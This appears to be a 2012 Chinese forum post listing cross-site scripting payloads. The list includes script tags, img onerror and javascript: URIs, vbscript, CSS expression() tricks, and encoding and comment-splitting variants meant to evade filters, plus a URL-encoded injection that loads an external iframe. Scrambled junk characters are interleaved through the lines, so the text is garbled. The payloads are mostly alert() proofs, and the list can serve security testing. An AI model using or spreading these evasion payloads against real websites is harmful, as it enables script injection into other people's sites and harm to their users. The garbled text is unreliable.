<script>alert("跨站")</script> (最常用)
+ |, n4 h7 M: I) n2 O6 C& T7 e1 T<img scr=javascript:alert("跨站")></img>2 ~1 O, e, h) _
<img scr="javascript: alert(/跨站/)></img>4 B! m$ B0 s# d9 C3 V
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)% T% b6 D9 L- \- G
<img scr="#" onerror=alert(/跨站/)></img> e3 P4 b; {4 G: h; O( Z5 `. A
<img scr="#" style="xss:expression(alert(/xss/));"></img>
3 e% T3 D$ O' n1 g<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
6 e& O! @0 S) ~2 y- t<img src=vbscript:msgbox ("xss")></img>$ q9 S6 O# Q* [% L
<style> input {left:expression (alert('xss'))}</style>
$ d# ]& ?9 L* b4 m0 u& e) `<div style={left:expression (alert('xss'))}></div>
6 ]3 }: ]4 d/ b# O9 M<div style={left:exp/* */ression (alert('xss'))}></div>' g0 m1 _7 b# J3 d' b0 j3 b4 L
<div style={left:\0065\0078ression (alert('xss'))}></div>
# \( n% V6 K. a; ]' j, Y! U) Z7 o" b4 Rhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>, {+ b( @3 Y6 h( Z8 `
unicode <div style="{left:expRessioN (alert('xss'))}">
0 L; g/ `% F7 y% S) V% Q% g5 ~ P3 Z( q) F1 g" u3 F T8 K0 `# A
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
+ k7 l: M) M8 B/ S3 V |
发表于 2012-9-15 14:09:13
收藏
支持
反对